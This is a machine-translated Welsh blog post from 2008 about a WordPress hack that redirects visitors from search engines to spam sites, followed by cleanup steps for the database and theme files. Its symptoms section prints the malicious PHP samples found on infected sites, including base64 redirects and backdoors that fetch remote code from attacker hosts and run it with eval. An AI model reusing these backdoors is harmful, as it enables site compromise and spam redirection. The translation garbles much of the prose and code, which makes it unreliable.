WordPress Darnia: Adenill a Atgyweiria Google a Chwilia Beiriant ai Na Cookie Fasnacha Redirected at 'ch - Anghenion.info, AnyResults.Net, 'n Euraid -Info.net a Arall 'n Anghyfreithiol Safleoedd

Hacwyr ydy yn cerdded pawb i maes at darnia a gweithia WordPress blogs hosted ar hyd a lled 'r gwe, yn plannu a yn chwistrellu 'n faleisus chyfundrefn i mewn i WordPress chyfundrefnau a chronfa ddata er redirect hymwelwyr a hits chan Google a arall chwilia beiriannau at spam safleoedd 'n gyfryw fel 'ch - anghenion.info, anyresults.net, 'n euraid -info.net, keymachine.de, beliy.us, seogoogle.us a lawer arall spam safleoedd a llanwedig ag dalu -per - chlecia CPC ads. Rhyw darnia appears at target 'n fwy dyrru at redirecting pawb heb WordPress cookie. Heb been darniedig, hyn fasnacha 'n dybiedig at chyrhaedda 'r blog fel ben taith.

Symptoms chan 'r Chwilia Beiriant Redirection Darnia

Noda a mo pawb symptoms Mai damweinia llwyr. 'na Mai bod yn anad hun drefn chan haciau bodoledig, a cyfranedig at 'n amgen yn cael a 'n bosib benderfyniad.

• Unrhyw chlecia drwo chan chwilia beiriannau 'n gyfryw fel Google, Yahoo, AOL, MSN, Ffenestri Buchedda chwilia canlyniadau, yn cynnwys blog enwa, ewyllysia bod redirected a llwybreiddiedig at hacwyr &#8217 safleoedd 'n gyfryw fel 'ch - anghenion.info, anyresults.net, 'n euraid -info.net, keymachine.de, beliy.us, seogoogle.us, ag 'r restra si brifio. Viewer arrives am 'r haciwr dudalen ag yr un chwilia linynna a e ai chwiliai i mewn chwilia beiriant.
• Chlecia acha ddolen at 'r blog acha RSS besgi darllenwr 'n gyfryw fel Google darllenwr all bod redirected at haciwr safle hefyd.
• Hymwelwr ag na adla acha 'r blog, ai peidio login ( ymaith ewigod mo has cookie daliedig at 'n faleisus chyfundrefn), ewyllysia bod redirected at spam safleoedd.
• Ond hymweliadau chan chwilia beiriant ydy been redirected ar gerdded, a 'r castia ymdopa at ffola am 'n debygol choelbren chan bloggers, webmasters a safle berchenogion, ai o leiaf addoeda 'r detection chan 'r broblem.
• 'n ddiswta 'n abrwysgl a 'n ddramatig ddefnynna a choll chan massive chod chan hymwelwyr fasnacha a dudalen golygfeydd i mewn gwe tracker ystadegau, 'n arbennig fasnacha ag Google fel referrer, hyd yn oed er chwilia beiriant canlyniadau raning ydy intact.
• Massic ddefnynna chan yn hysbysebu chyllid chan Google AdSense ai arall ads rhwydwaith, ai dadogi ddirprwyaethau.
• 'r yn canlyn base64 encoded PHP chyfundrefn Mai ledrithia acha 'r wp -blog -header.php ffeilia:

  <?php
$serefarraygoogle,msn,live,altavista,ask,yahoo,aol,cnn,weather,alexa= (" " " " " " " " " " " " " " " " " " " ");
ser0= foreachseref ($ fel ref) ifstrposstrtolower_SERVER’HTTP_REFERER’,ref ((($ ))!==false) ser1= &#8221?dorri
ai &#038 &#038 sizeof_COOKIE0 ($)==) headerLocation ( &#8221: http:/ &#8221.base64_decodeYW55cmVzdWx0cy5uZXQ. &#8221;= &#8221) &#8221 / &#8221) allanfa ? >

• Ddelw, sy i mewn ffaith bagad chan 'n faleisus PHP chyfundrefn, adiwyd at 'r wp - chynhwysiad /uploads chyfeiriadur. Er enghraifft, wp - chynhwysiad /uploads /2008 /06 /06 /abcdefghijklmn.jpg, ai bo i mewn 'ch destun folder, fi.e. wp-contents/themes/classic/images/xyz.jpg. 'r enwa chan 'r ddelw Mai bod i mewn 'r fformat chan xxxxxx_old.jpeg.
• Chofnodiad was inserted i mewn MySQL chronfa ddata achos WordPress wp_options at activate 'r ddelw ( 'r 'n faleisus PHP chyfundrefn) fel a plugin, typically fel rss_f541b3abd05e7962fcab37737f40fad8.
• 'na Mai bod hefyd 'n faleisus chyfundrefnau, 'n arbennig hynny a cyfieithedig ag eval ) ai base64_decode ) archa been inserted i mewn i arall WordPress PHP rengau. Enghreifftiau ydy 'r yn canlyn chyfundrefnau:

  ifisset_GET'p' (($ ))
sock = @fsockopenkm20725.keymachine.de ( &#8217 &#8217, 80)
ifsock ($)
fwrite (sock, ‘GET http: /km20725.keymachine.de / gweinyddwr / dangoseg.php? /aig._SERVER'SERVER_NAME'.p._GET'p'.= &#8217 &#8217 &= &#8217 &#8217 HTTP /1.0.rn &#8242 ” &#8221)
fwrite (sock, ‘Host: km20725.keymachine.de.rnrn &#8217 ” &#8221)
whilecontent ($ = fgets ($sock));
content = implode ( &#8221, content)
@evaltrimsubstrcontent ((($, strposcontent ($, “rnrn &#8221))))
fclose ($sock);


  ifisset_GET'p' (($ )) @eval@file_get_contentshttp (( &#8217: /beliy.us / gweinyddwr / dangoseg.php? /aig._SERVER'SERVER_NAME'.p._GET'p'= &#8217 &#8217 &= &#8217 ))


  ifisset_GET'p' (($ )) @eval@file_get_contentshttp (( &#8217: /seogoogle.us / gweinyddwr / dangoseg.php? /aig._SERVER'SERVER_NAME'.p._GET'p'= &#8217 &#8217 &= &#8217 ))


  evalgzinflatebase64_decode (((

• WordPress destun sy been activated a arferedig all bod chwistrelledig ag yn darnio chyfundrefn a 'n findlws hefyd. 'n gyfryw chyfundrefn normally exists i mewn header.php ai dangoseg.php chan 'r destun, a has bannod cyffelyb i 'r goris

  ifser”1″ (== &#038 &#038 sizeof_COOKIE0 ($)==) header”Location :

'r WordPress chwilia fasnacha redirect at spam safle darnia happens 'n debygol o achos ddiogelwch dyllu a vulnerability sy mo 'n glytiog pryd blog berchen decides mo at upgrade at 'n ddiweddara chyfieithiad chan WordPress ( serch rhyw adroddiadau a 'n hwy blogs been darniedig hyd yn oed er 'i &#8217 eisoes acha 'r 'n ddiweddara chyfieithiad chan WordPress 2.5.1). Whatever 'r achosa, heres &#8217 'r atgyweiria a ateb at benderfynu a gorchfyga 'r darnia at cadarnha a addefi bacia 'r fasnacha a arbed been penalized at Google at 'n afresymol redirecting at spam dudalennau.

1. Backup 'r WordPress chronfa ddata.
2. Arfer phpMyAdmin at bori WordPress MySQL chronfa ddata bordau. Cer at wp_options bord, a 'na baratoi i'r wasg 'r rhwyfa enwedig active_plugins. 'r rhwyfa fanylion pawb 'n esgud plugins a wedi bod activated. Cer drwo 'r restra ( mewn bannod), a chwilia an a plugin enwedig ddibenedig ag ddelw estyniad, 'n gyfryw fel.jpg,.jpeg,.gif a etc. Er enghraifft, abcdefgh_old.jpeg. Noda i lawr 'r llwybr at 'r ddelw ffeilia.
3. Yn arfer sFTP ai SSH ( anghofio am FTP ai Telnet achos ddiogelwch), 'na navigate at 'r llwybr chan 'r ffeilia, a ddilea 'r ffeilia.
4. Cer at WordPress Administrator Plugins banel, deactivate ai activate unrhyw plugin at amlyma off 'r 'n faleisus plugin chan 'r “active_plugins &#8221 rhwyfa.
5. Bacia at phpMyAdmin, am 'r wp_options bord, ca gwanaf a contains 'r yn canlyn linynna fel option_name:

   rss_f541b3abd05e7962fcab37737f40fad8

   Ddilea 'r rhwyfa ar gerdded.

   Ai 'ch dont &#8217 adnabod fel at chyflawna 'r chronfa ddata cleanup detailed i mewn camau goruwch, heres &#8217 a 'n fideo tutorial:

6. Cer at wp_users bord. Ai mae a 'n ddienw ddefnyddiwr (null brisio i mewn user_nicename barc) creedig am 000000:: acha 0000 -00 -00, noda i lawr 'r ddefnyddiwr ID (ID barc, dalm). Ddilea 'r ddefnyddiwr.
7. Bori 'r wp_usermeta bord. Leola pawb gwanafau ag user_id hymrysonfeydd 'r ID chan 'r ddileedig 'n anghyfreithiol ddefnyddiwr. Mae normally 'n dri gwanafau been cyfeillachedig at 'r goresgynnwr ddefnyddiwr ID. Ddilea pawb 'r cyfeillachedig gwanafau.
8. Login at 'r gweinyddwr at baratoi i'r wasg 'r destun rengau, ai bori 'r destun rengau &#8217 chyfundrefn i mewn Destun golygydd chan WordPress Administrator arfaetha banel. Atalfa 'r header.php a dangoseg.php achos unrhyw 'n amheugar chyfundrefn. Fel crybwylledig goruwch, chwilia rhywbeth cyffelyb i 'r bannod goris:

   ifser”1″ (== &#038 &#038 sizeof_COOKIE0 ($)==) header”Location :

   Ai sefydla, ddilea a dynnu 'r chyfundrefn. Noda a 'r 'n faleisus chyfundrefn ewyllysia bod 'n amryw banodau ddyhea i mewn chwbl.

9. Ai 'i &#8217 mo eisoes bodoledig, chrea an arllwys dangoseg.html ffeilia i mewn 'r wp - chynhwysiad /plugins chyfeiriadur. 'r 'n syn dangoseg.html chrwyn 'r chynhwysiad chan 'r plugins chyfeiriadur, 'n effeithiol aes beth fewn-blygiau been arferedig chan hacwyr at caleda a dynhau 'r WordPress ddiogelwch.
10. Upload a replace pob un a 'n bob WordPress rengau ( mo ond wp -blog -header.php) acha 'r gweinyddwr ag 'r 'n dirf, glanha, a 'n gysefin 'n ddiweddara chyfieithiad chan WordPress (wrth gwrs, eithria hychydig rengau 'n gyfryw fel wp -config.php a destunau). Ai youre &#8217 upgrading, darllen 'r arwain 'n ddichlyn.
11. Chyfnewid 'ch password.
12. Ai cei multiple ddefnyddwyr, chyfnewid eiddo password ( ai archa 'u at chyfnewid 'r password) hefyd.

'N BWYSIG: Dyma beiriant cyfieithedig dudalen sy arlwyedig " fel ydy " heb warranty. Beiriant chyfieithiad Mai bod 'n afrwydd at ddeall. Blesio chyfeiria at 'n gysefin Saesneg erthygl whenever 'n bosib.

Ran a chyfranna ai ca 'n dechnegol atega a chyfnertha am 'm 'n Ddigidol Buchedd Forums.

'n gytras Erthyglau

• Integrate a Arddangos Google AdSense achos Chwilia a Co -Op Arfer Chwilia Beiriant Canlyniadau i mewn WordPress Blog Dudalen Batrymlun
• Darnia at Chwilia a Golyga Rhyddha Buchedda Webcam ag Google Chwilia
• Google 'n Feddygol Chwilia Beiriant
• Wikiasari Google Co -op Arfer Chwilia Beiriant, Digg ai StumbleUpon achos Wikipedia?
• Llonaid Chyflea chan Google Chwilia Beiriant Ddygwyl Logo Casgl (1998 2007)
• Replace Google Blog Chwilia ag Technorati achos Incoming Ddolennau i mewn Dashboard chan WordPress
• StatTraq Wordpress Plugin achos Safle Statistic a Fasnacha Chownter
• Chrea Chwilia Beiriant achos Chyfrifiadur ag Copernic 'n Ben-desg Chwilia
• 'n grai Chwilia Beiriant Wikia Chwilia Launched
• Adia a Embed Google Fapiau, Google Checkout a Google Chwilia at Gwe Dudalen 'n Esmwyth ag WebAssist Dreamweaver Celfi achos Google

Hon chofnodiad bostiwyd acha Dydd Mawrth, Mehefin 10th, 2008 am 103: am a ffeilir dan Weblogs. Alli canlyn unrhyw responses at hon chofnodiad drwo 'r RSS 2.0 feed. Alli ad a response, ai trackback chan 'ch addef safle.